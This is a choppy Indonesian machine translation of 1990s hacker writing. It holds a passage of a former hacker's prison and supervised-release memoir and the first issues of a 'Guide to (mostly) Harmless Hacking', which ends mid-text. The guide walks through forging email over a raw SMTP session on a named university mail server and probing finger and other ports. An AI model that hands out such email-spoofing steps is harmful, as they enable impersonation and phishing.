cara mereka. Bersikap sopan, jangan mengajukan keluhan terhadap mereka dan berharap bahwa mereka akan mengurus Anda
ketika itu
tiba saatnya. Jika ini tampaknya tidak berhasil, maka Anda harus benar-benar kesakitan dan mengendarai mereka dengan setiap
kemungkinan permintaan Anda dapat dikerahkan. Ini sangat membantu jika Anda memiliki orang yang tidak mau melakukan
panggilan.
Perhatian media yang kuat biasanya, paling tidak, akan membuat penjara melakukan apa yang seharusnya mereka lakukan. Jika
Anda telah menerima banyak pers yang buruk, ini bisa menjadi kerugian. Jika Anda peduli terus menjadi masalah,
pr ison akan memindahkan Anda ke fasilitas lain di mana Anda lebih cenderung untuk beristirahat. Semuanya bagaimana Anda
memilih untuk berurusan dengan staf seringkali merupakan keputusan yang sulit. Saran saya adalah kecuali Anda benar-benar
kacau
lebih atau benar-benar membenci penjara tempat Anda berada, jangan mengacau.
J. THE HOLE
Segregasi menyebalkan, tetapi kemungkinan besar Anda akan menemukan diri Anda di sana pada suatu titik dan biasanya paling
banyak
alasan konyol. Terkadang Anda akan berakhir di sana karena apa yang dilakukan orang lain. Lubangnya adalah 6 'x
Kamar beton 10 'dengan tempat tidur baja dan toilet baja. Hak istimewa Anda akan bervariasi, tetapi pada awalnya Anda tidak
mendapatkan apa-apa selain a
mandi setiap beberapa hari. Secara alami mereka memberi makan Anda tetapi, itu tidak pernah cukup, dan seringkali dingin.
Dengan tidak
makanan ringan yang sering Anda temukan cukup lapar di sela-sela jam makan. Tidak ada yang bisa dilakukan di sana kecuali
membaca dan
semoga beberapa penjaga telah berbaik hati untuk melemparkan Anda beberapa novel lama.
Tindakan disiplin akan mendaratkan Anda di lubang selama satu atau dua minggu. Dalam beberapa kasus, Anda mungkin macet
di sana selama satu atau tiga bulan. Itu tergantung pada tembakan dan pada Letnan yang mengirimmu ke sana. Terkadang
orang tidak pernah meninggalkan lubang ....
K. WAKTU YANG BAIK
Anda mendapatkan 54 hari per tahun dari hukuman Anda untuk perilaku yang baik. Jika ada yang memberi tahu Anda bahwa
akan ada tagihan
diberikan untuk memberi 108 hari, mereka berbohong. 54 hari setahun menghasilkan 15% dan Anda harus melakukan sesuatu
penting untuk membenarkan pengambilan yang diambil. BOP telah datang dengan yang paling rumit dan
cara konyol untuk menghitung berapa banyak waktu yang baik yang telah Anda peroleh. Mereka memiliki buku sekitar tiga inci
tebal yang membahas bagaimana menghitung tanggal rilis tepat Anda. Saya mempelajari buku itu dengan intens dan datang ke
kesimpulan bahwa satu-satunya tujuan yang dilayaninya adalah mencuri diam-diam beberapa hari dari Anda. Sosok pergi.
RUMAH L. HALFWAY
Semua narapidana yang "memenuhi syarat" akan menjalani hukuman 10% terakhir dari hukuman mereka (tidak lebih dari enam
bulan) dalam suatu Komunitas
Pusat koreksi (CCC). Di CCC, yang tidak lebih dari rumah besar di bagian kota yang buruk, Anda
adalah untuk mencari pekerjaan di komunitas dan menghabiskan malam dan malam Anda di CCC. Anda harus memberi 25%
dari jumlah kotor cek Anda ke CCC untuk membayar semua pengeluaran Anda, kecuali jika Anda Federal jarang
tahanan dijatuhi hukuman untuk melayani seluruh waktu Anda di CCC dalam hal ini adalah 1 0%. Mereka akan bernafas dan
urinanalyse Anda secara rutin untuk memastikan Anda tidak terlalu bersenang-senang. Jika Anda seorang hacker kecil yang baik
Anda akan
dapatkan kartu akhir pekan agar Anda bisa keluar sepanjang malam. Sebagian besar CCC akan memindahkan Anda ke status
kurungan rumah
setelah beberapa minggu. Ini berarti Anda dapat pindah ke tempat Anda sendiri, (jika mereka menyetujuinya) tetapi masih harus
masuk
untuk malam hari. Mereka memeriksa Anda melalui telepon. Dan tidak, Anda tidak diizinkan meneruskan panggilan, kelinci
konyol.
M. RELEASE DIAWASI

Halaman 72
Hanya ketika Anda berpikir kesenangan sudah berakhir, setelah Anda dibebaskan dari penjara atau CCC, Anda akan diminta
untuk melakukannya
melaporkan ke Petugas Percobaan. Untuk 3 hingga 5 tahun ke depan Anda akan mendapatkan Supervised Release. Pemerintah
menghapus pembebasan bersyarat, sehingga mencegah para narapidana keluar dari penjara lebih awal. Meskipun demikian,
mereka masih ingin
awasi Anda sebentar.
Menurut pendapat saya, Supervised Release tidak lebih dari hukuman yang lama. Anda bukan orang yang bebas
untuk bepergian dan bekerja sesukamu. Semua aktivitas Anda harus disampaikan kepada Petugas Percobaan Anda
(PO). Dan masa percobaan pada dasarnya apa itu Supervised Release. PO Anda dapat melanggar Anda untuk hal teknis apa pun
pelanggaran dan mengirim Anda kembali ke penjara selama beberapa bulan, atau lebih dari setahun. Jika Anda memiliki riwayat
obat APAPUN
menggunakan Anda akan diminta untuk mengirimkan ke urinalyses (mingguan) acak. Jika Anda muncul kotor itu kembali ke
sendi.
Sebagai seorang hacker Anda mungkin menemukan bahwa akses Anda untuk bekerja dengan, atau memiliki peralatan komputer
mungkin
terbatas. Meskipun ini mungkin terdengar pragmatis bagi publik, dalam praktiknya tidak ada tujuan lain untuk itu
menghukum dan membatasi kemampuan mantan peretas untuk menghidupi dirinya sendiri. Dengan komputer di perpustakaan,
toko salinan,
sekolah, dan hampir di mana-mana, ini seperti membatasi seseorang yang menggunakan mobil untuk mencapai dan dari
perampokan bank untuk tidak pernah mengemudi lagi. Jika seorang peretas cenderung melakukan peretasan, ia akan dapat
melakukannya
atau tanpa batasan. Pada kenyataannya banyak peretas bahkan tidak membutuhkan komputer untuk mencapai tujuan mereka.
Seperti kamu
mungkin tahu telepon dan sedikit rekayasa sosial berjalan jauh.
Tetapi dengan sedikit keberuntungan Anda akan diberi PO yang masuk akal dan Anda akan tetap keluar dari masalah. Jika Anda
memberi
PO tidak ada alasan untuk mengawasi Anda, Anda mungkin menemukan kendali melonggarkan. Anda mungkin juga bisa
memilikinya
Rilis Supervisi Anda diberhentikan oleh pengadilan. Setelah satu tahun atau lebih, dengan alasan yang baik, dan semua milik
Anda
hutang pemerintah dibayarkan, mungkin masuk akal. Menyewa seorang pengacara, mengajukan mosi.
Bagi banyak narapidana, Pembebasan dengan Pengawasan terlalu banyak seperti berada di penjara. Bagi mereka yang terbaik
adalah melanggar,
kembali ke penjara selama beberapa bulan, dan berharap hakim mengakhiri Pembebasan Terawasi mereka. walaupun
juri dapat melanjutkan pengawasan Anda, ia biasanya tidak akan melakukannya.
N. RINGKASAN
Perjalanan yang aneh dan panjang. Saya memiliki banyak emosi campuran tentang seluruh cobaan saya. saya bisa
namun, katakan bahwa saya TELAH mendapat manfaat dari penahanan saya. Namun, itu tentu bukan atas nama
bagaimana saya ditangani oleh pemerintah. Tidak, terlepas dari upaya mereka untuk menendang saya ketika saya turun, gunakan
saya, balik
punggung mereka setelah saya membantu mereka, dan secara umum, hanya melanggar hak-hak saya, saya masih bisa muncul
lebih baik
berpendidikan daripada ketika saya masuk. Tapi terus terang, pembebasan saya dari penjara tepat pada waktunya. Jangka panjang
efek penahanan dan stres merayap pada saya, dan saya bisa melihat kondisi penjara
memburuk. Sulit untuk mengungkapkan kepedihan situasi tetapi sebagian besar dari mereka yang dipenjara merasakan hal itu
jika perubahan drastis tidak dilakukan, Amerika akan mengalami kekacauan serius, bahkan mungkin perang saudara. Ya itu
sistem peradilan pidana yang kacau. Rasa haus bangsa untuk membalas dendam pada penjahat membawa kita ke a
umpan balik setan dari kejahatan dan hukuman, dan kejahatan sekali lagi. Sederhananya, sistemnya tidak
kerja. Tujuan saya dalam menulis artikel ini bukan untuk mengirim pesan apa pun. Saya tidak memberitahu Anda bagaimana
tidak
untuk tertangkap dan saya tidak memberitahu Anda untuk berhenti meretas. Saya menulis ini hanya karena saya merasa seperti
saya berutang
siapa pun yang dapat menggunakannya. Untuk beberapa alasan aneh, saya secara aneh dipaksa untuk memberi tahu Anda apa
yang terjadi
saya. Mungkin ini semacam terapi, mungkin hanya ego saya, mungkin saya hanya ingin membantu orang miskin.
hacker berusia setahun yang benar-benar tidak tahu apa yang dia lakukan. Apa pun alasannya, saya hanya duduk
suatu hari dan mulai menulis.
Jika ada tema sentral untuk artikel ini adalah bagaimana jeleknya dunia Anda. Setelah Anda diraih
oleh hukum, tersedot ke dalam kekosongan mereka, dan mereka menyinari Anda, akan ada sedikit yang bisa Anda lakukan
Lindungi dirimu sendiri. Burung nasar dan predator akan mencoba mengambil apa yang mereka dapat dari Anda. Ini musim
terbuka untuk
Pengacara AS, pengacara Anda, narapidana lain, dan pejabat penjara. Anda menjadi permainan yang adil. Membela
diri Anda dari semua kekuatan ini akan membutuhkan semua kecerdasan Anda, semua sumber daya Anda, dan terkadang Anda
tinju.

Halaman 73
Melanjutkan penghinaan, pers, sebagai aturan umum, tidak akan peduli dengan menyajikan kebenaran. Mereka
akan mencetak apa yang cocok untuk mereka dan seringkali menghilangkan banyak fakta yang relevan. Jika Anda telah
membaca salah satu dari 5 buku saya
tercakup dalam Anda tidak diragukan lagi akan memiliki pendapat yang agak letih tentang saya. Biarkan saya meyakinkan Anda
bahwa jika Anda bertemu saya hari ini
Anda akan segera melihat bahwa saya cukup disukai dan bukan penjahat banyak (terutama Jon Littman) yang membuat saya
menjadi. Anda mungkin tidak setuju dengan bagaimana saya menjalani hidup saya, tetapi Anda tidak akan kesulitan memahami
mengapa saya memilih untuk hidup seperti itu. Memang saya telah melakukan kesalahan, tumbuh menjadi jalan yang panjang
bagi saya.
Meskipun demikian, saya tidak kekurangan teman baik. Teman yang sangat saya setiai. Tetapi jika Anda percaya
semua yang kamu baca kamu akan memiliki kesan bahwa Mitnick adalah pecundang pendendam, Poulsen penguntit sembunyi-
sembunyi,
dan aku tikus dua berwajah. Semua penilaian itu salah.
Sangat banyak untuk kesan pertama. Saya hanya berharap saya dapat mencerahkan Anda dan dalam beberapa cara membantu
Anda membuatnya
pilihan tepat. Apakah itu melindungi diri Anda dari apa yang bisa menjadi pengalaman mengubah hidup yang traumatis, atau
memaksa Anda untuk memfokuskan keterampilan komputer Anda di jalan lain, penting bagi Anda untuk mengetahui program
ini,
bahasa, dan aturannya.
Sampai jumpa di film
Agen Mencuri
1997
Isi Volume 1:
Tip hacking kolom ini: bagaimana jari pengguna melalui telnet.
Cara memalsukan email
Bagaimana jari dapat digunakan untuk meretas host Internet.
Bagaimana mendapatkan spammer Usenet menggebrak ISP mereka
Bagaimana mendapatkan spammer email memulai ISP mereka.
Cara nuke situs Web ofensif.
Cara Menempa Email Menggunakan Eudora Pro
_______________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 1
Tip hacking kolom ini: bagaimana jari pengguna melalui telnet.
_______________________________________________________
Peretasan. Kata itu memunculkan para jenius komputer jahat yang merencanakan kejatuhan peradaban saat tupai
pergi miliaran dana yang dicuri secara elektronik di bank Antigua.
Tapi saya mendefinisikan peretasan sebagai mengambil pendekatan bermain-main, penuh petualangan ke komputer. Peretas tidak
membaca buku.
Kami bermain-main dan mencoba hal-hal aneh, dan ketika kami menemukan sesuatu yang menghibur, kami memberi tahu
teman-teman kami
tentang itu. Beberapa dari kita mungkin penjahat, tetapi lebih sering kita orang baik, atau setidaknya tidak berbahaya.
Lebih jauh lagi, peretasan sangat mudah. Saya akan memberi Anda kesempatan untuk membuktikannya kepada diri sendiri, hari
ini!
Tetapi terlepas dari mengapa Anda ingin menjadi seorang hacker, itu pasti cara untuk bersenang-senang, mengesankan teman-
teman Anda, dan
dapatkan kencan. Jika Anda seorang peretas wanita, Anda menjadi sangat menarik bagi semua pria. Terima kata-kataku untuk
itu!; ^ D
Kolom ini bisa menjadi gerbang Anda ke dunia ini. Bahkan, setelah membaca hanya Panduan pertama ini untuk (kebanyakan)
Meretas Tanpa Bahaya, Anda akan dapat melakukan aksi yang akan mengesankan rata-rata pria atau wanita
sial ^ H ^ H ^ H ^ H ^ H ^ H ^ H cukup beruntung untuk dikoleksi oleh Anda di sebuah pesta.

Halaman 74
Jadi apa yang Anda butuhkan untuk menjadi seorang hacker? Namun, sebelum saya memberi tahu Anda, saya akan membuat
Anda berteriak-teriak.
Pernahkah Anda memposting pesan ke grup berita atau daftar email yang ditujukan untuk meretas? Anda mengatakan sesuatu
seperti
"Apa yang saya butuhkan untuk menjadi seorang hacker?" Betcha Anda tidak akan mencoba * itu * lagi!
Ini memberi Anda pendidikan dalam arti "nyala", kan?
Ya, beberapa tipe 3l1te ini suka menyalakan pemula. Mereka bertingkah seolah mereka dilahirkan sambil memegangi Unix
manual di satu tangan dan dokumen spesifikasi TCP / IP di tangan lain dan siapa pun yang tahu sedikit adalah sampah.
***********************
Catatan newbie: 3l1t3, 31337, dll. Semua berarti "elit." Idenya adalah untuk mengambil kata "elit" atau "eleet" dan
nomor pengganti untuk beberapa atau semua huruf. Kami juga suka zs. Hacker d00dz melakukan sor7 ini dari th1ng l0tz.
********************
Sekarang mungkin Anda meminta bantuan dengan tulus. Tapi ada alasan mengapa banyak peretas cepat menyala
orang asing yang meminta bantuan.
Yang kami khawatirkan adalah tipe orang yang berkata, "Saya ingin menjadi seorang peretas. Tetapi saya * tidak * ingin belajar
pemrograman dan sistem operasi. Berikan beberapa kata sandi, d00dz! Ya, dan nomor kartu kredit !!! "
Jujur, saya telah melihat posting semacam ini di kelompok peretas. Poskan sesuatu seperti ini dan Anda kemungkinan akan
bangun
keesokan paginya untuk menemukan kotak email Anda diisi dengan 3.000 pesan dari grup diskusi email pada
irigasi pertanian, proktologi, pengumpul doo-ayah Franklin Mint, dll., dll., dll. arrrgghhhh!
Alasan kami khawatir tentang peretas wannabe adalah kemungkinan untuk masuk ke komputer orang lain
dan melakukan kerusakan serius bahkan jika Anda hampir sama sekali tidak tahu.
Bagaimana seorang pemula yang tidak tahu apa-apa bisa merusak komputer orang lain? Mudah. Ada FTP publik dan situs Web
di
Internet yang menawarkan program peretasan kaleng.
Berkat alat-alat kalengan ini, banyak "peretas" yang Anda baca tentang tertangkap sebenarnya tidak tahu apa-apa
Pemula.
Kolom ini akan mengajarkan Anda cara melakukan peretasan yang nyata, namun legal dan tidak berbahaya, tanpa menggunakan
ini
alat peretasan. Tapi saya tidak akan mengajari Anda cara merusak komputer orang lain. Atau bahkan cara membobol mana
kamu tidak termasuk.
******************************
Anda dapat masuk ke ujung penjara: Sekalipun Anda tidak membahayakan, jika Anda membobol bagian komputer yang tidak
dapat dibuka
publik, Anda telah melakukan kejahatan. Jika Anda telnet melintasi batas negara untuk masuk, Anda telah melakukan
kejahatan federal.
*************************************
Saya akan fokus pada peretasan Internet. Alasannya adalah bahwa setiap komputer di Internet memiliki semacam
koneksi publik dengan sisa Net. Artinya adalah jika Anda menggunakan perintah yang tepat, Anda bisa
* Secara hukum * mengakses komputer ini.
Itu, tentu saja, adalah apa yang sudah Anda lakukan ketika Anda mengunjungi situs Web. Tetapi saya akan menunjukkan cara
mengakses dan
menggunakan komputer host Internet dengan cara yang tidak diketahui oleh kebanyakan orang. Selanjutnya, ini
* Menyenangkan * peretasan.

Halaman 75
Bahkan, segera Anda akan belajar peretasan yang menjelaskan bagaimana orang lain (Bukan, kan? Janji?)
masuk ke bagian host yang tidak umum. Dan - ini adalah peretasan yang bisa dilakukan siapa saja.
Tapi, ada satu hal yang benar-benar perlu Anda dapatkan. Ini akan membuat peretasan menjadi lebih mudah:
AKUN SHELL !!!!
"Akun shell" adalah akun Internet di mana komputer Anda menjadi terminal salah satu ISP Anda
komputer host. Setelah Anda berada di "shell" Anda dapat memberikan perintah ke sistem operasi Unix seperti
Anda sedang duduk di sana di depan salah satu host ISP Anda.
Peringatan: orang dukungan teknis di ISP Anda mungkin memberi tahu Anda bahwa Anda memiliki "akun shell" ketika Anda
benar-benar
jangan. Banyak ISP yang tidak terlalu suka akun shell. Tebak kenapa? Jika Anda tidak memiliki akun shell, Anda
tidak bisa meretas!
Tetapi Anda dapat dengan mudah mengetahui apakah itu adalah akun shell asli. Pertama, Anda harus menggunakan "program
emulasi terminal" untuk mencatat
di. Anda akan memerlukan program yang memungkinkan Anda untuk meniru terminal VT 100. Jika Anda memiliki Windows
3.1 atau
Windows 95, program terminal VT 100 termasuk sebagai salah satu program aksesori Anda.
Setiap ISP yang baik akan memungkinkan Anda untuk mencobanya selama beberapa hari dengan akun tamu. Dapatkan satu dan
coba beberapa
Perintah Unix untuk memastikan itu benar-benar akun shell.
Anda tidak tahu Unix? Jika Anda serius ingin memahami peretasan, Anda perlu referensi yang bagus
buku. Tidak, saya tidak bermaksud jenis dengan judul terengah-engah seperti "Rahasia hacker Super." Saya sudah membeli
terlalu banyak
buku semacam itu. Mereka penuh udara panas dan tipis tentang cara melakukannya. Peretas serius mempelajari buku tentang:
a) Unix. Saya suka "The Unix Companion" oleh Harley Hahn.
b) Kerang. Saya suka "Learning the Bash Shell" oleh Cameron Newham dan Bill Rosenblatt. "Shell" adalah
antarmuka perintah antara Anda dan sistem operasi Unix.
c) TCP / IP, yang merupakan seperangkat protokol yang membuat Internet berfungsi. Saya suka "TCP / IP for Dummies" oleh
Marshall Wilensky dan Candace Leiden.
OK, kata-kata kasar sudah berakhir. Waktunya meretas!
Bagaimana Anda ingin memulai karir peretasan dengan salah satu peretasan yang paling sederhana namun berpotensi berbulu
Internet? Ini dia: telnet ke port jari.
Pernahkah Anda menggunakan perintah jari sebelumnya? Finger terkadang akan memberi tahu Anda banyak hal tentang yang
lain
orang-orang di Internet. Biasanya Anda cukup memasukkan perintah:
jari Joe_Schmoe@Fubar.com
Tetapi alih-alih Joe Schmoe, Anda memasukkan alamat email seseorang yang ingin Anda periksa. Untuk
misalnya, alamat email saya adalah cmeinel@techbroker.com. Jadi untuk jari saya, berikan perintah:
jari cmeinel@techbroker.com
Sekarang perintah ini mungkin memberi tahu Anda sesuatu, atau mungkin gagal dengan pesan seperti "akses ditolak."
Tetapi ada cara yang lebih elit untuk jari orang. Anda bisa memberi perintah:
telnet llama.swcp.com 79
Apa yang baru saja dilakukan perintah ini adalah membiarkan Anda menggunakan komputer dengan alamat Internet
llama.swcp.com
melalui port 79 - tanpa memberinya kata sandi.

Halaman 76
Tetapi program yang dijalankan llama dan banyak host Internet lainnya biasanya hanya akan memungkinkan Anda untuk
memberi
SATU perintah sebelum secara otomatis menutup koneksi. Buat perintah itu:
cmeinel
Ini akan memberi tahu Anda rahasia peretas tentang mengapa port 79 dan program jarinya jauh lebih penting daripada
Anda mungkin berpikir. Atau, sial, mungkin sesuatu yang lain jika hacker ramah lingkungan masih menanam
menghina pesan dalam file saya.
Sekarang, untuk bonus peretasan tambahan, coba telnetting ke beberapa port lain. Sebagai contoh:
telnet kitsune.swcp.com 13
Itu akan memberi Anda waktu dan tanggal di sini di New Mexico, dan:
telnet slug.swcp.com 19
Akan menunjukkan waktu yang tepat!
OK, saya keluar untuk kolom ini. Dan saya berjanji untuk memberi tahu Anda lebih banyak tentang apa yang lebih penting dari
telnetting
ke jari - tetapi kemudian. Selamat melakukan peretasan!
************************************************ *****
Ingin berbagi beberapa kewl hacker? Katakan aku hebat? Nyalakan aku? Untuk dua yang pertama, saya di
cmeinel@techbroker.com. Silakan mengarahkan api ke dev/null@techbroker.com. Selamat melakukan peretasan!
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 2
Dalam masalah ini kita belajar bagaimana memalsukan email - dan bagaimana menemukan pemalsuan. Saya janji, retasan ini
luar biasa
mudah!
______________________________________________________________
Peretasan Heroik dalam Setengah Jam
Bagaimana Anda benar-benar ingin meledakkan teman-teman Anda? OK, apa hal paling hairiest yang kamu dengar dari super itu
peretas lakukan?
Itu mendapatkan akses tidak sah ke komputer, kan?
Jadi bagaimana Anda ingin mendapatkan akses dan menjalankan program di hampir semua jutaan
komputer terhubung ke Internet? Bagaimana Anda ingin mengakses komputer Internet ini dengan cara yang sama
cara sebagai peretas paling terkenal dalam sejarah: Robert Morris!
Itu adalah "Morris Worm" yang meruntuhkan Internet pada tahun 1990. Tentu saja, kelemahan yang ia eksploitasi untuk diisi
10% komputer di Internet dengan virus self-mailing-nya telah diperbaiki sekarang - di sebagian besar Internet
tuan rumah.
Tetapi fitur Internet yang sama masih memiliki banyak kesenangan dan permainan serta bug yang tersisa di dalamnya. Padahal,
kita ini apa
akan belajar adalah langkah pertama dari beberapa cara paling umum yang digunakan peretas untuk masuk ke area pribadi
komputer yang tidak curiga.

Halaman 77
Tapi saya tidak akan mengajari Anda untuk masuk ke bagian pribadi komputer. Kedengarannya terlalu busuk. Selain itu, saya
juga
alergi terhadap penjara.
Jadi apa yang akan Anda pelajari adalah legal, tidak berbahaya, namun tetap menyenangkan. Tidak menarik tirai dan bersumpah
sumpah darah di antara teman-temanmu yang akan menyaksikanmu melakukan peretasan ini.
Tetapi - untuk melakukan peretasan ini, Anda memerlukan layanan on-line yang memungkinkan Anda melakukan telnet ke port
tertentu pada sebuah
Tuan rumah internet. Netcom, misalnya, akan membiarkan Anda lolos begitu saja.
Tapi Compuserve, America Online, dan banyak Penyedia Layanan Internet lainnya (ISP) adalah pengasuh yang baik
bahwa mereka akan melindungi Anda dari godaan ini.
Tetapi cara terbaik Anda untuk melakukan ini adalah dengan ACCOUNT SHELL! Jika Anda belum memilikinya, dapatkan
sekarang!
***********************************
Catatan pemula # 1; Akun shell adalah akun Internet yang memungkinkan Anda memberikan perintah Unix. Unix sangat mirip
DOS. Anda mendapatkan prompt di layar Anda dan mengetik perintah. Unix adalah bahasa Internet. Jika kamu
ingin menjadi peretas yang serius, Anda harus belajar Unix.
****************************
Bahkan jika Anda belum pernah melakukan telnet, peretasan ini sangat sederhana. Bahkan, meskipun Anda tentang apa
untuk belajar akan terlihat seperti peretasan jenis yang paling heroik, Anda dapat menguasainya dalam waktu setengah jam - atau
kurang. Dan kau
hanya perlu menghafal * dua * perintah.
Untuk mengetahui apakah penyedia layanan Internet Anda akan membiarkan Anda melakukan ini, coba perintah ini:
telnet callisto.unm.edu 25
Ini adalah komputer di Universitas New Mexico. Akun Compuserve saya mendapatkan uap saat saya mencoba
ini. Itu hanya crash keluar dari telnet tanpa banyak "tsk, tsk."
Tapi setidaknya hari ini Netcom akan membiarkan saya melakukan perintah ini. Dan hampir semua "akun shell" murah yang
ditawarkan oleh
penyedia layanan Internet fly-by-night akan membiarkan Anda melakukan ini. Banyak akun kuliah akan membiarkan Anda pergi
dengan ini juga.
******************************
Catatan pemula # 2: Cara Mendapatkan Akun Shell
Coba buku telepon halaman kuning Anda. Lihat di bawah Internet. Panggil dan minta "akun shell."
Mereka biasanya akan berkata, "Tentu, bisa." Tetapi sering kali mereka berbohong. Mereka pikir kamu terlalu bodoh untuk tahu
apa akun shell sebenarnya. Atau orang bergaji rendah yang Anda ajak bicara tidak memiliki petunjuk.
Cara mengatasinya adalah dengan meminta akun tamu sementara gratis. ISP mana pun yang berharga akan memberi Anda ujian
mendorong. Kemudian cobalah hack hari ini.
*******************************
OK, anggaplah Anda memiliki akun yang memungkinkan Anda melakukan telnet di tempat yang serius. Jadi mari kita kembali
ke ini
perintah:
telnet callisto.unm.edu 25

Halaman 78
Jika Anda pernah melakukan telnet sebelumnya, Anda mungkin hanya memasukkan nama komputer yang Anda rencanakan
untuk dikunjungi,
tetapi tidak menambahkan angka apa pun setelahnya. Tetapi angka-angka sesudahnya adalah yang membuat perbedaan pertama
antara warga negara Internet yang baik dan membosankan, dan seseorang yang meluncur menuruni lereng hacker yang licin.
Apa artinya 25 itu adalah bahwa Anda memerintahkan telnet untuk membawa Anda ke port tertentu sesuai keinginan Anda
korban, er, komputer.
***********************************
Catatan pemula # 3: Ports
Port komputer adalah tempat di mana informasi masuk atau keluar darinya. Di komputer di rumah Anda, contoh porta
adalah monitor Anda, yang mengirimkan informasi, keyboard dan mouse Anda, yang mengirimkan informasi, dan
modem Anda, yang mengirimkan informasi keluar dan masuk.
Tetapi komputer host Internet seperti callisto.unm.edu memiliki lebih banyak port daripada komputer di rumah.
Port-port ini diidentifikasi oleh angka. Sekarang ini tidak semua port fisik, seperti keyboard atau serial RS232
port (untuk modem Anda). Mereka adalah port (perangkat lunak) virtual.
***********************************
Tapi ada phun di port 25. Phun yang luar biasa. Anda lihat, setiap kali Anda telnet ke port komputer 25, Anda
akan mendapatkan salah satu dari dua hasil: sesekali, sebuah pesan yang mengatakan "akses ditolak" saat Anda menekan firewall.
Tetapi lebih dari itu
sering kali tidak, Anda mendapatkan sesuatu seperti ini:
Mencoba 129.24.96.10 ...
Terhubung ke callisto.unm.edu.
Karakter melarikan diri adalah '^]'.
220 callisto.unm.edu Smail3.1.28.1 # 41 siap pada Jumat, 12 Jul 96 12:17 MDT
Hei, lihat ini! Itu tidak meminta kami untuk login. Ia hanya mengatakan ... siap!
Perhatikan itu menjalankan Smail3.1.28.1, sebuah program yang digunakan untuk menulis dan mengirim email.
Ohmigosh, apa yang harus kita lakukan sekarang? Nah, jika Anda benar-benar ingin terlihat canggih, hal berikutnya yang Anda
lakukan adalah bertanya
callisto.unm.edu untuk memberi tahu Anda perintah apa yang dapat Anda gunakan. Secara umum, ketika Anda menggunakan
komputer asing,
setidaknya satu dari tiga perintah akan memberi Anda informasi: "tolong," "?", atau "laki-laki." Dalam hal ini saya ketik:
membantu
... dan inilah yang saya dapatkan
250 Perintah SMTP berikut diakui:
250
250 startup nama host HELO dan berikan nama host Anda
250 MAIL FROM: <alamat pengirim> mulai transaksi dari pengirim
250 RCPT TO: <address penerima> nama penerima untuk pesan
250 VRFY <alamat>
memverifikasi kemampuan pengiriman alamat
250 EXPN <alamat>
perluas alamat milis
250 DATA
mulai teks pesan email
250 RSET
atur ulang keadaan, drop transaksi
250 NOOP
tidak melakukan apapun
250 DEBUG [level]
atur level debugging, default 1
250 BANTUAN
menghasilkan pesan bantuan ini
250 QUIT
tutup koneksi SMTP
250
250 Urutan normal peristiwa dalam mengirim pesan adalah untuk menyatakan

Halaman 79
250 alamat pengirim dengan perintah MAIL FROM, berikan penerima
250 perintah RCPT TO sebanyak yang diperlukan (satu alamat per perintah)
250 dan kemudian untuk menentukan teks pesan email setelah perintah DATA.
250 Beberapa pesan dapat ditentukan. Akhiri yang terakhir dengan QUIT.
Mendapatkan daftar perintah ini cukup bagus. Itu membuat Anda terlihat sangat kewl karena Anda tahu cara mendapatkannya
komputer untuk memberi tahu Anda cara meretasnya. Dan itu berarti yang harus Anda ingat adalah "telnet <hostname> 25
Perintah "dan" bantuan ". Untuk sisanya, Anda cukup memeriksa perintah saat online. Jadi, sekalipun
ingatanmu sama buruknya dengan ingatanku, kau benar-benar dapat mempelajari dan menghafal peretasan ini hanya dalam
waktu setengah jam. Heck,
mungkin setengah menit.
OK, jadi apa yang kita lakukan dengan perintah ini? Yup, Anda sudah tahu, ini email yang sangat, sangat primitif
program. Dan tebak mengapa Anda bisa mendapatkannya tanpa masuk? Tebak mengapa itu adalah titik kerentanan
yang memungkinkan Robert Morris untuk crash internet?
Port 25 memindahkan email dari satu node ke node berikutnya di Internet. Secara otomatis mengambil email masuk dan
jika email itu bukan milik seseorang dengan alamat email di komputer itu, ia mengirimkannya ke yang berikutnya
komputer di internet, akhirnya menuju ke orang yang memiliki email ini.
Terkadang email akan langsung dari pengirim ke penerima, tetapi jika Anda mengirim email ke seseorang yang jauh, email
mungkin pergi
melalui beberapa komputer.
Ada jutaan komputer di Internet yang meneruskan email. Dan Anda bisa mendapatkan akses ke hampir semua tempat
salah satu komputer ini tanpa kata sandi! Selain itu, karena Anda akan segera belajar, mudah untuk mendapatkannya
Alamat internet dari jutaan komputer ini.
Beberapa komputer ini memiliki keamanan yang sangat baik, sehingga sulit untuk bersenang-senang dengan mereka. Tapi yang
lain
memiliki keamanan yang sangat sedikit. Salah satu kesenangan dari peretasan adalah menjelajahi komputer-komputer ini untuk
menemukan komputer yang sesuai dengan komputer
mewah.
OK, jadi sekarang kita berada di negara Morris Worm, apa yang bisa kita lakukan dengannya?
********************************
Catatan Genius Jahat: Morris menggunakan perintah "DEBUG". Jangan coba ini di rumah. Saat ini jika Anda menemukan
program berjalan pada port 25 dengan perintah DEBUG, itu mungkin jebakan. Percayalah kepadaku.
********************************
Nah, inilah yang saya lakukan. (Perintah saya tidak memiliki angka di depannya, sedangkan respons komputer
diawali dengan angka.)
helo santa@north.pole.org
250 callisto.unm.edu Halo santa@north.pole.org
surat dari: santa@north.pole.org
250 <santa@north.pole.org> ... Pengirim Oke
rcpt ke: cmeinel@nmia.com
250 <cmeinel@nmia.com> ... Penerima Oke
data
354 Masukkan email, akhiri dengan "." pada garis dengan sendirinya
Berhasil!!!
.
250 Surat diterima
Apa yang terjadi di sini adalah saya mengirim beberapa email palsu kepada diri saya sendiri. Sekarang mari kita lihat apa yang
saya dapatkan di
kotak surat, menampilkan tajuk lengkap:

Halaman 80
Inilah yang saya lihat menggunakan versi gratis Eudora:
X POP3 Rcpt: cmeinel @ socrates
Baris ini memberi tahu kita bahwa X-POP3 adalah program ISP saya yang menerima email saya, dan email masuk saya adalah
ditangani oleh Socrates komputer.
*******************************
Kiat Genius Jahat: email yang masuk ke program pembacaan email Anda ditangani oleh port 110. Coba telnetting
suatu hari nanti Tetapi biasanya POP, program yang berjalan pada 110, tidak akan memberi Anda bantuan dengan perintah dan
mem-boot Anda begitu Anda salah langkah.
*******************************
Jalur Pengembalian: <santa@north.pole.org>
Baris di atas adalah alamat email palsu saya.
Rupanya Dari: santa@north.pole.org
Tanggal: Jum, 12 Jul 96 12:18 MDT
Tetapi perhatikan bahwa baris header di atas mengatakan "Rupanya-Dari" Ini penting karena mengingatkan saya kepada
fakta bahwa ini adalah surat palsu.
Rupanya Kepada: cmeinel@nmia.com
Status X:
Berhasil!!!
Ini fakta menarik. Program membaca email yang berbeda menunjukkan tajuk yang berbeda. Jadi seberapa baik Anda
email palsu tergantung pada bagian pada program email apa yang digunakan untuk membacanya. Inilah yang Pine, program
email
